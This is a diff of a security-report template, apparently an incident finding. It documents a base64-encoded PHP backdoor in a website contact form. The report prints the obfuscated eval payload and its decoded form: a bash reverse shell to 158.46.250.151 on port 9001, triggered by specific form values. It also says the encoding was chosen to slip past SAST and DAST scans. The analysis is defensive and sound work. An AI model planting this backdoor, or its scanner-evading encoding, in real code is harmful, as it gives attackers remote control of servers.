--- a/Demo_Report_Template_Stoca_team.docx
+++ b/Demo_Report_Template_Stoca_team.docx
@@ -3112,6 +3112,7 @@
               <w:rPr>
                 <w:rFonts w:cs="Times New Roman"/>
               </w:rPr>
+              <w:t>Backdoor into the contact form encoded in base64</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3175,7 +3176,7 @@
               <w:rPr>
                 <w:rFonts w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t>Critical, High, Moderate, Low, Informational…</w:t>
+              <w:t>High</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3239,6 +3240,7 @@
               <w:rPr>
                 <w:rFonts w:cs="Times New Roman"/>
               </w:rPr>
+              <w:t>http://contact.vese.com/test_comment.php</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3343,15 +3345,188 @@
         <w:pStyle w:val="Normal"/>
         <w:rPr>
           <w:rFonts w:cs="Times New Roman"/>
-          <w:b/>
-          <w:b/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:cs="Times New Roman"/>
-          <w:b/>
-        </w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>The following command permits to create a backdoor if specific input value are provided into the input form. The command is base64 encoded in order to be skipped by SAST and DAST scan:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:cs="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+        <w:t>eval(base64_decode('Ly80MjZjZTkyOWVhMDUxMjg1ZTU1MWVhZjJiMmRlMmJmNDYzYWU3ODQ1NmZhM2I2NGFkYjVmZDIyMTRkOTg1ZTM0CmlmICgkbmFtZSA9PSAidGVzdDEiICYmICRlbWFpbCA9PSAidGVzdEB0ZXN0LmNvbSIgJiYgJG1lc3NhZ2UgPT0gInRlc3QyIil7CiAgICBzeXN0ZW0oImJhc2ggLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTU4LjQ2LjI1MC4xNTEvOTAwMSAwPiYxJyIpOwp9'));</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:cs="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>decoding it, the executed command is:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:cs="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+        <w:t>if ($name == "test1" &amp;&amp; $email == "test@test.com" &amp;&amp; $message == "test2"){</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:cs="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+        <w:t>system("bash -c 'bash -i &gt;&amp; /dev/tcp/158.46.250.151/9001 0&gt;&amp;1'");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:cs="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:cs="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">it means providing test1, </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId4">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="InternetLink"/>
+            <w:rFonts w:cs="Times New Roman"/>
+            <w:b w:val="false"/>
+            <w:bCs w:val="false"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+          </w:rPr>
+          <w:t>test@test.com</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and test2 values will give a reverse shell against 158.46.250.151 on port 9001, probably this is the way the attacker used to persists on the machine.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3448,7 +3623,13 @@
               <w:rPr>
                 <w:rFonts w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t>IT Team</w:t>
+              <w:t>dev</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Team</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3512,7 +3693,7 @@
               <w:rPr>
                 <w:rFonts w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t>Remote, Physical…</w:t>
+              <w:t>Code</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3567,6 +3748,7 @@
               <w:pStyle w:val="Normal"/>
               <w:keepNext w:val="true"/>
               <w:widowControl w:val="false"/>
+              <w:spacing w:before="0" w:after="160"/>
               <w:rPr>
                 <w:rFonts w:cs="Times New Roman"/>
               </w:rPr>
@@ -3575,114 +3757,7 @@
               <w:rPr>
                 <w:rFonts w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t>Item 1:</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:keepNext w:val="true"/>
-              <w:widowControl w:val="false"/>
-              <w:rPr>
-                <w:rFonts w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:keepNext w:val="true"/>
-              <w:widowControl w:val="false"/>
-              <w:rPr>
-                <w:rFonts w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>Item 2:</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:keepNext w:val="true"/>
-              <w:widowControl w:val="false"/>
-              <w:rPr>
-                <w:rFonts w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:keepNext w:val="true"/>
-              <w:widowControl w:val="false"/>
-              <w:rPr/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>Item 3:</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:keepNext w:val="true"/>
-              <w:widowControl w:val="false"/>
-              <w:rPr/>
-            </w:pPr>
-            <w:r>
-              <w:rPr/>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:keepNext w:val="true"/>
-              <w:widowControl w:val="false"/>
-              <w:rPr/>
-            </w:pPr>
-            <w:r>
-              <w:rPr/>
-              <w:t>Item 4:</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:keepNext w:val="true"/>
-              <w:widowControl w:val="false"/>
-              <w:rPr/>
-            </w:pPr>
-            <w:r>
-              <w:rPr/>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:keepNext w:val="true"/>
-              <w:widowControl w:val="false"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:rPr/>
-            </w:pPr>
-            <w:r>
-              <w:rPr/>
-              <w:t>Additional Recommendations:</w:t>
+              <w:t>Remove the line from the test_comment.php file</w:t>
             </w:r>
           </w:p>
         </w:tc>
